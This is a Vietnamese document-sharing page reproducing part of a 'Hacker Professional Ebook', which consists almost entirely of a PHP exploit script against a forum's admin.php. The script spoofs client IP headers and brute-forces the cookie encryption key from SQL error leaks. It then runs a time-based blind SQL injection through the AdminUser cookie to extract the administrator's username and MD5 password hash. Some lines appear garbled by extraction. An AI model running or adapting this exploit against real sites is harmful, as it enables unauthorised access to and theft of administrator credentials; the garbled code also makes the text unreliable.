1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 422 doc

6 115 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Hacker Professional Ebook Part 422 Doc
Thể loại ebook
Định dạng
Số trang 6
Dung lượng 19,23 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Trang 1

echo "please wait \n";

function StrCode($string,$action='ENCODE'){

$key = $GLOBALS['my_fragment'];

$string = $action == 'ENCODE' ? $string : base64_decode($string);

$len = 18;

$code = '';

for($i=0; $i<strlen($string); $i++){

$code = $string[$i] ^ $key[$k];

}

$code = $action == 'DECODE' ? $code : base64_encode($code); return $code;

}

function random($length) {

$hash = '';

$chars = '0123456789abcdef';

$max = strlen($chars) - 1;

mt_srand((double)microtime() * 1000000);

for($i = 0; $i < $length; $i++) {

$hash = $chars[mt_rand(0, $max)];

}

return $hash;

}

function is_my_key($fragment)

{

if (ereg("^[a-f0-9]{18}",trim($fragment))) {return true;}

else {return false;}

}

//need cookie prefix

$packet ="GET ".$p."index.php HTTP/1.0\r\n";

$packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof

$packet.="Host: ".$host."\r\n";

$packet.="Accept: text/plain\r\n";

$packet.="Connection: Close\r\n\r\n";

Trang 2

sendpacketii($packet);

$temp=explode("lastfid=",$html);

$temp2=explode("Set-Cookie: ",$temp[0]);

$cp=$temp2[1];

echo "cookie prefix -> ".$cp."\n";

if (!$e)

{

//see sql errors you need a valid key for strcodeii() function,

//so let's ask :)

$tt="\t";for ($i=1; $i<=255; $i++){$tt.=chr($i);}

while (1)

{

$GLOBALS['my_fragment']=random(18);

$au=StrCode($tt,"ENCODE");

$packet ="GET ".$p."admin.php HTTP/1.0\r\n";

$packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof

$packet.="Host: ".$host."\r\n";

$packet.="Cookie: ".$cp."AdminUser=".$au.";\r\n";

$packet.="Accept: text/plain\r\n";

$packet.="Connection: Close\r\n\r\n";

sendpacketii($packet);

$html=html_entity_decode($html);

$html=str_replace("<br />","",$html);

if ((eregi("WHERE username='",$html)) and (eregi("You Can Get Help In",$html))){

$temp=explode("WHERE username='",$html);

$temp2=explode("'<br>",$temp[1]);

$decoded=$temp2[0];

if (strlen($decoded)==255) break;

}

}

$decoded="\t".$decoded;

$temp = $au;

//calculating key

$key="";

for ($j=0; $j<18; $j++){

Trang 3

for ($i=0; $i<255; $i++){

$aa="";

if ($j<>0){

for ($k=1; $k<=$j; $k++){

$aa.="a";

}

}

$GLOBALS['my_fragment']=$aa.chr($i);

$t = StrCode($temp,"DECODE");

if ($t[$j]==$decoded[$j]){

$key.=chr($i);

}

}

}

if (is_my_key($key)){

echo "encryption key ->".$key."\n";

$GLOBALS['my_fragment']=$key;

}

else

{die("unable to retrieve the magic key ");}

}

$chars[0]=0;//null

$chars=array_merge($chars,range(48,57)); //numbers

$chars=array_merge($chars,range(97,102));//a-f letters

$j=1;$password="";

while (!strstr($password,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

if (in_array($i,$chars))

{

//you can use every char because of base64_decode() so this bypass magic quotes

$sql="9999999'/**/OR/**/(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),be nchmark(".$b.",char(0)),-1))/**/AND/**/groupid=3/**/LIMIT/**/1/*";

echo "sql -> ".$sql."\n";

$packet ="GET ".$p."admin.php HTTP/1.0\r\n";

Trang 4

$packet.="CLIENT-IP: 1.2.3.4\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Cookie:

".$cp."AdminUser=".StrCode("9999999999\t".$sql,"ENCODE").";\r\n";

$packet.="Accept: text/plain\r\n";

$packet.="Connection: Close\r\n\r\n";

$packet.=$data;

sendpacketii($packet);

usleep(2000000);

$starttime=time();

echo "starttime -> ".$starttime."\r\n";

sendpacketii($packet);

if (eregi("You Can Get Help In",$html)) {

die($html."\n\n"."debug: you have to modify sql code injected, it seems a different version ");

}

$endtime=time();

echo "endtime -> ".$endtime."\r\n";

$difftime=$endtime - $starttime;

echo "difftime -> ".$difftime."\r\n";

if ($difftime > $timeout) {$password.=chr($i);echo "password ->

".$password."[???]\r\n";sleep(2);break;}

}

if ($i==255) {

die("\nExploit failed ");

}

}

$j++;

}

$j=1;$admin="";

while (!strstr($admin,chr(0)))

{

for ($i=0; $i<=255; $i++)

{

$sql="9999999'/**/OR/**/(IF((ASCII(SUBSTRING(username,".$j.",1))=".$i."),be nchmark(".$b.",char(0)),-1))/**/AND/**/groupid=3/**/LIMIT/**/1/*";

echo "sql -> ".$sql."\n";

Trang 5

$packet ="GET ".$p."admin.php HTTP/1.0\r\n";

$packet.="CLIENT-IP: 1.2.3.4\r\n";

$packet.="Host: ".$host."\r\n";

$packet.="Cookie:

".$cp."AdminUser=".StrCode("9999999999\t".$sql,"ENCODE").";\r\n"; $packet.="Accept: text/plain\r\n";

$packet.="Connection: Close\r\n\r\n";

$packet.=$data;

sendpacketii($packet);

usleep(2000000);

$starttime=time();

echo "starttime -> ".$starttime."\r\n";

sendpacketii($packet);

$endtime=time();

echo "endtime -> ".$endtime."\r\n";

$difftime=$endtime - $starttime;

echo "difftime -> ".$difftime."\r\n";

if ($difftime > $timeout) {$admin.=chr($i);echo "admin ->

".$admin."[???]\r\n";sleep(2);break;}

if ($i==255) {

die("\nExploit failed ");

}

}

$j++;

}

function is_hash($hash)

{

if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}

else {return false;}

}

if (is_hash($password)) {

print_r('

-

admin user -> '.$admin.'

pwd hash (md5) -> '.$password.'

-

');

Ngày đăng: 04/07/2014, 12:20

Xem thêm

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN